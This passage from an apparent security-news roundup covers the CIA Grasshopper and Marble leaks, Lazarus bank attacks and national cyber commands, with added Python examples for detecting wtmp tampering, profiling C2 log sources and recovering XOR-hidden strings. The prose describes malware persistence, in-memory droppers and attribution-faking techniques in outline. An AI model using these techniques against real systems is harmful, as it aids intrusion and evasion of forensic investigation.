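# ut_tv.tv_sec / tv_usec (32-bit each for cross-arch compatibility),
# ut_addr_v6[4], 20 reserved bytes.  Total: 384 bytes.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384

EMPTY, USER_PROCESS, DEAD_PROCESS = 0, 7, 8  # ut_type values from <utmp.h>


def _text(field):
    """C string in a fixed-width field -> str."""
    return field.split(b"\0", 1)[0].decode("utf-8", "replace")


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one wtmp record; used here only to construct sample data."""
    def cstr(s, n):
        return s.encode()[:n].ljust(n, b"\0")
    return struct.pack(UTMP_FMT, ut_type, pid, cstr(line, 32), cstr(line[-4:], 4),
                       cstr(user, 32), cstr(host, 256), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


def parse_wtmp(data):
    """One dict per record.  A size that is not a whole number of records is
    itself suspicious (truncated or partially overwritten file)."""
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp size %d is not a multiple of %d" % (len(data), UTMP_SIZE))
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({"type": f[0], "pid": f[1], "line": _text(f[2]),
                        "user": _text(f[4]), "host": _text(f[5]), "time": f[9]})
    return records


def tamper_indicators(records):
    """Heuristics for a wtmp edited in place instead of appended by login/init.
    Returns (record index, reason) pairs."""
    findings = []
    last_time = 0
    open_lines = set()
    for i, r in enumerate(records):
        if r["type"] == EMPTY and r["time"] == 0 and not r["user"]:
            findings.append((i, "zeroed"))         # record wiped rather than removed
            continue
        if r["time"] < last_time:
            findings.append((i, "out-of-order"))   # appended logs only move forward
        last_time = max(last_time, r["time"])
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] in open_lines:
                open_lines.discard(r["line"])
            else:
                findings.append((i, "orphan-logout"))  # login record is missing
    return findings


ACCEPTED_RE = re.compile(r"Accepted \S+ for (\S+) from (\S+) port")


def logins_missing_from_wtmp(records, auth_log_lines):
    """(user, host) pairs sshd accepted that have no USER_PROCESS record in
    wtmp.  A cleaned wtmp cannot be reconciled with a second source that the
    cleaner did not also edit."""
    seen = {(r["user"], r["host"]) for r in records if r["type"] == USER_PROCESS}
    missing = []
    for line in auth_log_lines:
        m = ACCEPTED_RE.search(line)
        if m and (m.group(1), m.group(2)) not in seen:
            missing.append((m.group(1), m.group(2)))
    return missing


# Constructed sample data (2017-04-08 00:00:00 UTC as the base time).
T0 = 1491609600
SAMPLE_WTMP = b"".join([
    pack_record(USER_PROCESS, 4101, "pts/0", "alice", "203.0.113.5", T0 + 56521),
    pack_record(DEAD_PROCESS, 4101, "pts/0", "", "", T0 + 60000),
    pack_record(DEAD_PROCESS, 4188, "pts/1", "", "", T0 + 61000),  # its login was removed
    bytes(UTMP_SIZE),                                              # record overwritten with zeros
    pack_record(USER_PROCESS, 4250, "pts/2", "bob", "198.51.100.9", T0 + 30000),  # earlier than predecessor
])
SAMPLE_AUTH_LOG = [
    "Apr  8 15:42:01 host sshd[4101]: Accepted publickey for alice from 203.0.113.5 port 5222 ssh2",
    "Apr  8 16:10:45 host sshd[4188]: Accepted password for carol from 192.0.2.44 port 6001 ssh2",
    "Apr  8 08:20:00 host sshd[4250]: Accepted publickey for bob from 198.51.100.9 port 5119 ssh2",
]

if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    print("tamper indicators:", tamper_indicators(recs))
    print("accepted logins absent from wtmp:", logins_missing_from_wtmp(recs, SAMPLE_AUTH_LOG))
```

The heuristics only catch sloppy editing; a careful cleaner removes whole records and leaves the ordering intact, which is why the cross-source check against sshd's own log (or against a remote syslog copy the host cannot modify) is the part that matters in practice.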
More key findings will come as soon as other security researchers delve into the dump.
At this time, it's not confirmed whether the group holds more NSA hacking tools and exploits or whether this is the last batch of documents the Shadow Brokers stole from the United States intelligence organization.


WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework
8.4.2017 thehackernews BigBrothers
WikiLeaks reveals 'Grasshopper Framework' that CIA used to build Customized Windows Malware
As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonging to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.
All the leaked documents are basically a user manual that the agency flagged as "secret" and that are supposed to be only accessed by the members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, the Grasshopper framework allows agency members to easily create custom malware, depending upon technical details such as what operating system and antivirus the targets are using.
The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.
"A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."
The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even from the anti-virus products from the world's leading vendors including Kaspersky Lab, Symantec, and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."
"Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such malware is "Carberp," which is a malware rootkit developed by Russian hackers.
"The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."
Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.


WikiLeaks leaked files on the Grasshopper framework, a CIA Tool for creating customized malware installers
8.4.2017 securityaffairs BigBrothers 

Wikileaks published a new batch of 27 documents detailing the Grasshopper framework used by CIA agents to create custom installers for Windows malware.
WikiLeaks continues to disclose documents included in the CIA Vault 7 archive; on Friday it published a new batch of 27 documents detailing a framework, dubbed Grasshopper, allegedly used to create custom installers for Windows malware.

The Grasshopper framework allows CIA operators to build a custom payload, run it and analyze the results of the execution.

The leaked documents compose a user guide classified as “secret” that was available to the CIA cyber spies.

“The documents WikiLeaks publishes today provide insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.


The dropper described in the Grasshopper manual should be loaded and executed only in memory; the framework allows creating custom malware able to compromise the target system while bypassing the antivirus it is using.

“A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,” reads the manual. “Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.”

Each executable generated with the Grasshopper framework contains one or more installers.

The framework offers operators various persistence mechanisms and lets them define a series of rules that must be met before an installation is launched. The rules allow attackers to target specific systems by specifying their technical details (i.e. x64 or x86 architecture, OS version).

“An executable may have a global rule that will be evaluated before execution of any installers. If a global rule is provided and evaluates to false the executable aborts operation” continues the manual.

One of the persistence mechanisms reported in the user guide is called Stolen Goods; with it, the CIA reused the mechanisms implemented by malicious code used by crooks in the wild.

For example, the CIA has modified some components of the popular Carberp rootkit.

“The persistence method and parts of the installer were taken and modified to fit our needs,” reads a leaked document. “A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.”

Another persistence mechanism leverages the Windows Update Service to execute the payload on every system boot or every 22 hours; the technique relies on a series of DLLs specified in the registry.

WikiLeaks has already leaked the “Year Zero” batch which contains detailed info on the CIA hacking exploits and the “Dark Matter” batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs. A few days ago, WikiLeaks published the third batch called “Marble,” a collection of files describing the CIA anti-forensics tool dubbed Marble framework.


WikiLeaks Details CIA Tool for Creating Windows Malware Installers

8.4.2017 securityweek BigBrothers
WikiLeaks leaks more alleged CIA hacking tools

WikiLeaks on Friday published 27 documents detailing a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to create custom installers for malware designed to target Windows systems.

The framework, dubbed “Grasshopper,” has been described as a tool that allows operators to build a custom installation executable, run that executable, and evaluate the results of the execution. The Grasshopper user guide specifies that the dropper should be loaded and executed only in memory.

Leaked documents show that Grasshopper provides various persistence mechanisms and allows users to define a series of conditions that need to be met before an installation is launched. These rules can help determine if the targeted device is running the correct version of Windows and if certain security products are present.

One of the persistence mechanisms highlighted by WikiLeaks involves the Windows Update Service, which can be abused to ensure that the payload is executed on every system boot or every 22 hours, when the service loads a series of DLLs specified in the registry.

WikiLeaks also highlighted Stolen Goods, a Grasshopper persistence module that borrows code from the notorious Carberp banking Trojan, whose source code was leaked a few years ago. The authors of Stolen Goods, however, pointed out that only some parts of the Carberp code were taken and those were heavily modified.

“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.

This is the third round of files made public by WikiLeaks as part of the dump called Vault 7. The organization claims to possess numerous exploits allegedly used by the CIA and it has offered to share them with affected tech companies, but it appears that many firms are not willing to comply with WikiLeaks’ demands to obtain the information.

An analysis of the information made public to date has shown that many of the vulnerabilities have already been patched by security firms and tech giants such as Apple and Google. Cisco did admit finding a critical vulnerability affecting many of its switches following an analysis of the Vault 7 files.


Ecuador's New President Warns Assange Not to 'Meddle'

4.4.2017 securityweek BigBrothers
Ecuador's President-elect Lenin Moreno warned Julian Assange on Tuesday not to meddle in the country's politics, after the WikiLeaks founder taunted a rival candidate following his loss.

Moreno's election victory Sunday was a relief for Assange, who has been holed up in Ecuador's London embassy since 2012 to avoid arrest.

The socialist president-elect's conservative rival, Guillermo Lasso, had vowed to kick Assange out of the embassy.

But Moreno had some stern words after Assange took to Twitter to celebrate Lasso's loss.

"Mr Julian Assange must respect the condition (of asylum) he is in and not meddle in Ecuadoran politics," he said at a news conference.

As results showed Lasso losing on election night, Assange had exuberantly turned around the right-wing candidate's threat to expel him within 30 days.

"I cordially invite Lasso to leave Ecuador within 30 days (with or without his tax haven millions)," he tweeted -- a reference to allegations the ex-banker has money stashed in offshore accounts.

Assange fled to the embassy to avoid arrest and extradition to Sweden, where he faces a rape allegation.

The 45-year-old Australian, who denies the allegation, says he fears Sweden would send him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents in 2010.

Outgoing President Rafael Correa, a fiery critic of the US, granted Assange asylum, and Moreno has vowed to uphold it.

Assange's case has returned to the spotlight since WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and her Democratic party.

That created an awkward situation for the Ecuadoran government, which responded by temporarily restricting his internet access.


Kaspersky Links Global Cyber Attacks to North Korea

4.4.2017 securityweek BigBrothers
ST. MAARTEN – SECURITY ANALYST SUMMIT – Just days after reports surfaced that U.S. prosecutors were preparing to point fingers at the North Korean government for directing the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016, Kaspersky Lab unveiled new details on the hacking group believed to be conducting the attack and several others.

The Bangladesh heist is considered one of the largest and most successful cyber heists ever, and Kaspersky said there is a “high chance” that the attacks were conducted by Lazarus, a North Korea-linked hacking group responsible for a series of regular and destructive attacks, including the devastating attack against Sony Pictures in late 2014.

On Monday at Kaspersky Lab’s Security Analyst Summit in St. Maarten, the Moscow-based security firm shared its findings on the malicious tools the group uses and how it operates.

The company also said that it managed to disrupt other potential Lazarus operations attempting to steal funds from unnamed banks in Southeast Asia and Europe.

While Kaspersky’s team believes Lazarus to be a large group focused on infiltration and espionage operations, the company said a “substantially smaller” unit within the group, responsible for financial profit, exists, which it has dubbed Bluenoroff.

In February, researchers discovered attacks aimed at banks in Poland that were linked back to Lazarus. As part of the operation, the attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) so that malware would be served to its visitors.

“The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many,” Kaspersky explained. “Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.”

Since December 2015, Kaspersky Lab was able to detect malware samples relating to Lazarus group activity that appeared in financial institutions, casinos, software developers for investment companies and crypto-currency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries.

Recent forensic analysis conducted by a Kaspersky Lab partner of a C2 server in Europe used by the Lazarus/Bluenoroff group also provided some interesting North Korea-related discoveries.

“Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2,” Kaspersky Lab's Global Research & Analysis Team explained in a blog post. “Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.”
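The C2-server review described above comes down to profiling every source address that touched the server and noticing the odd one out: many addresses behind proxies and VPNs, and one short connection from a range the operator did not expect. The block below is an added example written for this page, not Kaspersky's tooling or data. It parses a few constructed Tomcat-style access-log lines, builds a per-address profile (hit count, first and last seen, time span) and flags addresses that fall into a hypothetical watch range or that made only a single request. The log lines, the addresses (RFC 5737 documentation ranges) and the watch range are all constructed.

```python
import ipaddress
import re
from datetime import datetime

# Constructed sample in the Tomcat/Apache "common" access-log pattern.
# Addresses come from the RFC 5737 documentation ranges; nothing here is
# taken from the Kaspersky report.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Feb/2017:10:01:02 +0000] "GET /c2/index.jsp HTTP/1.1" 200 312
192.0.2.10 - - [01/Feb/2017:10:01:09 +0000] "POST /c2/index.jsp HTTP/1.1" 200 88
198.51.100.7 - - [01/Feb/2017:11:30:44 +0000] "POST /c2/index.jsp HTTP/1.1" 200 91
not a log line at all
198.51.100.7 - - [02/Feb/2017:09:12:00 +0000] "POST /c2/index.jsp HTTP/1.1" 200 90
203.0.113.77 - - [02/Feb/2017:09:15:21 +0000] "GET /c2/index.jsp HTTP/1.1" 200 312
192.0.2.10 - - [03/Feb/2017:08:00:00 +0000] "POST /c2/index.jsp HTTP/1.1" 200 87
"""

# Hypothetical watch list (CIDR -> label). A real review would use the ranges
# the analyst considers unusual for the server's legitimate operators.
WATCH_RANGES = {"203.0.113.0/24": "hypothetical unusual range"}

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def profile_sources(log_text, watch_ranges):
    """Return {ip: {"hits", "first", "last", "span_s", "watch"}} per client address."""
    nets = {ipaddress.ip_network(cidr): label for cidr, label in watch_ranges.items()}
    profile = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed lines are skipped, not fatal
        ip = m.group("ip")
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        entry = profile.setdefault(ip, {"hits": 0, "first": ts, "last": ts, "watch": None})
        entry["hits"] += 1
        entry["first"] = min(entry["first"], ts)
        entry["last"] = max(entry["last"], ts)
    for ip, entry in profile.items():
        entry["span_s"] = int((entry["last"] - entry["first"]).total_seconds())
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # hostname in the client field; leave it unwatched
        for net, label in nets.items():
            if addr in net:
                entry["watch"] = label
                break
    return profile


def flag_sources(profile, rare_threshold=1):
    """Return {ip: [reasons]} for addresses that deserve a closer look."""
    flags = {}
    for ip, entry in profile.items():
        reasons = []
        if entry["watch"]:
            reasons.append(f"in watched range ({entry['watch']})")
        if entry["hits"] <= rare_threshold:
            reasons.append(f"rare source ({entry['hits']} request(s))")
        if reasons:
            flags[ip] = reasons
    return flags


if __name__ == "__main__":
    prof = profile_sources(SAMPLE_LOG, WATCH_RANGES)
    for ip, reasons in flag_sources(prof).items():
        e = prof[ip]
        print(f"{ip}: {'; '.join(reasons)}; seen {e['first']} .. {e['last']} ({e['span_s']} s)")
```

The rare-source rule is deliberately separate from the watch list: the interesting address in the report was both in an unexpected range and seen only briefly, and either signal alone is worth a look when the other sources are all proxy or VPN exits with steady traffic.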


Other firms, including BAE Systems and Symantec, previously had linked the Bangladesh theft to a series of cyber-attacks on the U.S. financial system and the hacking of Sony Pictures.

Still an Active Threat

Kaspersky’s team believes that Lazarus will remain one of the biggest threats to banking, finance and other firms for the next few years.

“We’re sure they’ll come back soon. In all, attacks like the ones conducted by Lazarus group show that a minor misconfiguration may result in a major security breach, which can potentially cost a targeted business hundreds of millions of dollars in loss,” said Vitaly Kamluk, head of the Global Research and Analysis Team APAC at Kaspersky Lab. “We hope that chief executives from banks, casinos and investment companies around the world will become wary of the name Lazarus.”

North Korea Cyber Attack Attribution

While Kaspersky Lab did not officially accuse North Korea as being behind the attacks, the firm did display a strong case against the Hermit State. "This is the first time we have seen a direct link between Bluenoroff and North Korea," the company said. "Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation."

In a presentation at the Security Analyst Summit, Kamluk said that, while unlikely, another group could have invested a huge amount of money to frame North Korea. He also speculated that a third force could be involved to help North Korea from the outside.

Kaspersky has published a detailed report (PDF), which includes infiltration methods, their relation to attacks on SWIFT software, and insights on attribution. The report also includes Indicators of Compromise (IOC) and other data to help defenders detect possible Lazarus-related activity in their networks. They also produced a short video summarizing the activity of the group.

 


Japan plans to develop a hack-proof satellite system
3.4.2017 securityaffairs BigBrothers

Japan plans to develop a hack-proof satellite system to protect transmissions between satellites and ground stations with dynamic encryption of data.
Japan’s Internal Affairs and Communications Ministry plans to develop a communications system to protect satellites from cyber attacks.

The hack proof satellite system will protect transmissions between satellites and ground stations implementing a dynamic encryption of data.

“With the proposed plan, the government aims to establish a secure communications network that is unique to Japan, for domestic security purposes and to spur investment in the private-sector aerospace industry.” reported the Watertown Daily Times.

The ambitious project of a hack-proof satellite system is led by the National Institute of Information and Communications Technology, which falls under the jurisdiction of the ministry, and will involve government, industry and academic institutions. The goal is to offer the system for commercial purposes in five to 10 years; by developing a secure communications system that private-sector users (i.e. companies and organizations) will be able to use at low cost, the communications ministry aims to gain an advantage in the industry.

The final decision on the hack-proof satellite system will be taken this summer; funds for its activities will be included in the budget plan for fiscal 2018.

Cyber attacks represent a serious threat to satellite communications. Satellites play a crucial role in our digital society, and almost every industry benefits from their services; for this reason their security is a pillar of the cyber security strategies of governments worldwide.

Attackers pose a growing challenge to satellite operators; commercial satellites, which lack the level of security of military ones, are the most exposed. Security researchers are warning about the possible effects of a successful attack against satellite systems and are urging that they be built with a security-by-design approach.

Satellites communicate with terrestrial base stations using radio waves, which hackers can intercept, with unpredictable consequences.

Hackers who can decode the encrypted data can steal information, manipulate it or take control of the satellite.

Governments consider the threat of a cyber attack launched by a nation-state actor, a criminal organization or even a lone hacker to be realistic. The principal concerns relate to operations conducted by Chinese hackers, likely state-sponsored attackers, who in the past have already breached the security of US satellites.


In August, the Chinese government launched the world’s first quantum satellite, which will help it establish “hack-proof” communications between space and the ground.

Alleged state-sponsored hackers interfered with the operations of two U.S. government satellites in 2007 and 2008 obtaining access through a ground station in Norway. The satellites were used for climate monitoring.

The hackers “achieved all steps required to command” the Terra AM-1 satellite, but did not control it. An attacker with command privileges could “deny or degrade as well as forge or otherwise manipulate the satellite’s transmission,” or simply damage or otherwise destroy the satellite.

The project of the Japanese Government is to install a code generator on satellites so they can dynamically encrypt data.

“The dynamic codes will be sent to the ground base station using light beams. As the encryption is dynamic, it is more difficult for hackers to decode data even if they are able to intercept transmissions.” continues the Watertown Daily Times.

The code generator is a small cube (approximately 10 centimeters on each side) that could be easily installed on a micro satellite being developed by a start-up firm, which is approximately 30-40 centimeters on each side.


German Military to Launch the Bundeswehr’s new Cyber and Information Space Command
2.4.2017 securityaffairs  BigBrothers

Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command.
Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command, a structure that is considered strategic for the defence of the country from cyber attacks.

According to the new commander, Lieutenant General Ludwig Leinhos, Germany is taking a leading role among the members of the NATO alliance.

“Leinhos said the main tasks would be to operate and protect the military’s own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.” reported the Reuters agency.

The German Government intends to protect its critical infrastructure and its assets from cyber attacks. The German military fears cyber espionage and sabotage.

The Bundeswehr’s new Cyber and Information Space (CIR) Command will start with 260 IT specialists, but the Government plans to grow its staff to 13,500 military and civilian personnel by July.

General Ludwig Leinhos confirmed that the centre will be tasked with developing offensive cyber capabilities.

“He said the centre would also develop and war-game offensive capabilities because ‘in order to be able to defend yourself, you have to know the options for attack’.” continues the Reuters report.

The operations conducted by the Cyber and Information Space (CIR) Command would have to be approved by the German Parliament; this means that cyber operations are treated the same as conventional military missions.

The creation of the centre is the response to the numerous attacks suffered by the German Government; last year the Bundestag itself was hit.


In June, German media reported that Bundestag may need to replace 20,000 computers after hackers breached the Bundestag systems.

According to the Der Spiegel magazine, security experts involved in the investigation of the attack against the Bundestag suspect that the hack was part of a large-scale espionage campaign conducted by Russian state-sponsored hackers.

The German defense ministry said that in the first nine weeks of 2017, the IT systems of the Bundeswehr had been hit by more than 280,000 attacks.

“we are in a constant race between the development of attack options and defensive capabilities” concluded Leinhos.


WikiLeaks Reveals the Marble framework, used by the CIA to make attribution harder
2.4.2017 securityaffairs BigBrothers

WikiLeaks has published the third batch of documents dubbed Marble that revealed the CIA anti-forensics tool dubbed Marble framework.
WikiLeaks released the third batch of the CIA Vault7 archive, which sheds light on the anti-forensics tools used by the intelligence agency.

The first tranche of CIA documents from Vault7 was related to hacking tools and techniques, while the second batch included detailed info about hacking tools specifically designed to hack SmartTV, Android handhelds, Apple iPhones, Macs and Windows systems.

This third lot of documents, dubbed Marble, contains 676 source code files of the secret anti-forensic Marble Framework.

The experts from the CIA developed the Marble Framework to hinder forensic analysis of its malicious code.

The code used by the CIA was able to evade detection by implementing various techniques; for example, it is able to detect whether it is running in a virtual machine sandbox.

The Marble platform makes attribution of the attacks harder; the documents show how the CIA can conduct a cyber attack in a way that leads experts to attribute it to other countries, including Russia, China, North Korea and Iran.

“Today, March 31st 2017, WikiLeaks releases Vault 7 “Marble” — 676 source code files for the CIA’s secret anti-forensic Marble Framework. Marble is used to hamper forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA.” reads Wikileaks.

“Marble does this by hiding (“obfuscating”) text fragments used in CIA malware from visual inspection. This is the digital equivalent of a specialized CIA tool to place covers over the English language text on U.S. produced weapons systems before giving them to insurgents secretly backed by the CIA.”


The CIA Marble Framework platform includes algorithms that insert multiple strings in various languages into the malware source code to make attribution harder. Using such techniques, malware authors try to trick victims into believing that the malware was developed by American/English-speaking VXers.

“The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi.” continues Wikileaks. “This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, but there are other possibilities, such as hiding fake error messages.”

Marble Framework does not contain any vulnerabilities or exploits.

The Marble dump also includes a deobfuscator to reverse CIA text obfuscation; using it, experts can identify patterns of attacks conducted by the CIA and attribute previous hacking attacks and malicious codes to the Agency. Marble was in use at the CIA during 2016; in 2015 the cyber spies were using version 1.0.


WikiLeaks Reveals 'Marble' Source Code that CIA Used to Frame Russia and China
1.4.2017 thehackernews BigBrothers
WikiLeaks published hundreds of more files from the Vault 7 series today which, it claims, show how CIA can mask its hacking attacks to make it look like it came from other countries, including Russia, China, North Korea and Iran.
Dubbed "Marble," part 3 of the CIA files contains 676 source code files of a secret anti-forensic Marble Framework, which is basically an obfuscator or a packer used to hide the true source of CIA malware.
The CIA's Marble Framework tool includes a variety of different algorithms, with foreign-language text intentionally inserted into the malware source code to fool security analysts and falsely attribute attacks to the wrong nation.
The leaked files indicate that the Marble's source code includes Chinese, Russian, Korean, Arabic and Farsi languages, as well as English, which shows that the CIA has engaged in clever hacking games.
"Marble is used to hamper[ing] forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA," says the whistleblowing site.
"...for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion," WikiLeaks explains.
The released source code archive also contains a deobfuscator to reverse CIA text obfuscation.

Since the Marble framework has now been made public, forensic investigators and anti-virus firms would be able to connect patterns and missing dots in order to reveal wrongly attributed previous cyber attacks and viruses.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for and security bugs in popular hardware and software, and the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs.
While WikiLeaks suggests that Marble was in use as recently as 2016, the organization does not provide any evidence to back this claim. Experts are still analyzing the Marble release, so there's no need to get too excited at this moment.
The White House has condemned the revelations made by Wikileaks, saying that those responsible for leaking classified information from the agency should be held accountable by the law.


German Military to Launch Cyber Command

1.4.2017 securityweek  BigBrothers

Germany's armed forces Saturday launch a cyber command, with a status equal to that of the army, navy and air force, meant to shield its IT and weapons systems from attack.

Military planners fear that wars of the future will start with cyber attacks against critical infrastructure and networks, extensive online espionage and sabotage. The Bundeswehr's new Cyber and Information Space (CIR) Command, based in the former West German capital of Bonn, will start off with 260 IT specialists but grow to 13,500 military and civilian personnel by July.

With the new digital force, Germany is taking a leading role among NATO allies, its new commander, Lieutenant General Ludwig Leinhos, told news weekly Focus.

Leinhos said the main tasks would be to operate and protect the military's own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.

He said the centre would also develop and war-game offensive capabilities because "in order to be able to defend yourself, you have to know the options for attack".

However, any full-scale cyber attacks abroad would have to be approved by the German parliament, just like any other military mission.

The security of national and government IT systems, meanwhile, remains the responsibility of the interior ministry which oversees the domestic security agency that handles counterespionage.

The German government has been sensitized to cyber security since the parliament was attacked last year, with security sources suspecting Russian hackers behind the attack.

Defense Minister Ursula von der Leyen had announced the creation of the cyber command two years ago to protect the military from increasing numbers of online attacks.

The defense ministry said that in this year's first nine weeks alone, the IT systems of the Bundeswehr had been targeted more than 280,000 times.

Leinhos said that "we are in a constant race between the development of attack options and defensive capabilities".


WikiLeaks Releases CIA Tool Used to Impede Malware Attribution

31.3.2017 securityweek BigBrothers
WikiLeaks has released information and source code for a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to make analysis of its tools and attribution more difficult.

The whistleblower organization on Friday made public 676 source code files of the Marble Framework. According to WikiLeaks, version 1.0 of the framework was released in 2015, and the CIA has continued using it during 2016.

Files that appear to be part of the official Marble Framework documentation describe it as a framework “designed to allow for flexible and easy-to-use obfuscation when developing tools.” These types of techniques have been used by many malware developers to hinder researchers.

The first round of Vault 7 files released by WikiLeaks showed that the CIA learned from the NSA’s mistakes after the intelligence agency’s Equation Group was exposed by security researchers. CIA employees apparently determined that the use of custom cryptography was one of the NSA’s biggest mistakes, as it allowed researchers to link different pieces of malware to the same developer.

The Marble framework allows obfuscation of a tool using a random technique to prevent forensics investigators and security vendors from linking it to a specific developer. Marble users can also select the algorithm they want to use or configure the application to omit certain algorithms.

Charles R. Smith, CEO of Softwar Inc, pointed out that Marble leverages the Bouncy Castle cryptography APIs.

During its analysis of the Marble source code, WikiLeaks identified test examples written in Chinese, Russian, Korean, Arabic and Farsi, which suggests that the agency may have used the framework to trick investigators into believing that its tools were developed by individuals speaking one of these languages.


“This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion,” WikiLeaks said. “But there are other possibilities, such as hiding fake error messages.”

The source code files made available by WikiLeaks also include a deobfuscation tool.
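The Marble coverage in this article and the two preceding ones describes two things: text fragments in the malware hidden from visual inspection, with a deobfuscator to reverse them, and decoy test strings in Chinese, Russian, Korean, Arabic and Farsi meant to mislead attribution. The block below is an added illustration written for this page, not Marble's code, format or algorithm. It pairs a toy obfuscator (single-byte XOR, with the key stored beside the string in a constructed record layout) with the analyst side: a scanner that walks a binary blob, recovers the hidden text, filters false positives, and reports which writing systems each recovered string uses. The sample strings, keys and zero-byte filler are constructed.

```python
# Constructed record layout for this toy: [key byte][length byte][UTF-8 text XOR key].
# Real obfuscators differ in detail, but share the property shown here: the
# key has to be recoverable by the malware itself, so it is recoverable by an
# analyst too. Obfuscation hides strings from a casual look, not from analysis.


def obfuscate(text: str, key: int) -> bytes:
    """Hide one string: XOR its UTF-8 bytes with a single key byte."""
    raw = text.encode("utf-8")
    if not 1 <= key <= 255 or not 1 <= len(raw) <= 255:
        raise ValueError("key must be 1..255 and text 1..255 UTF-8 bytes")
    return bytes([key, len(raw)]) + bytes(b ^ key for b in raw)


def script_of(ch: str) -> str:
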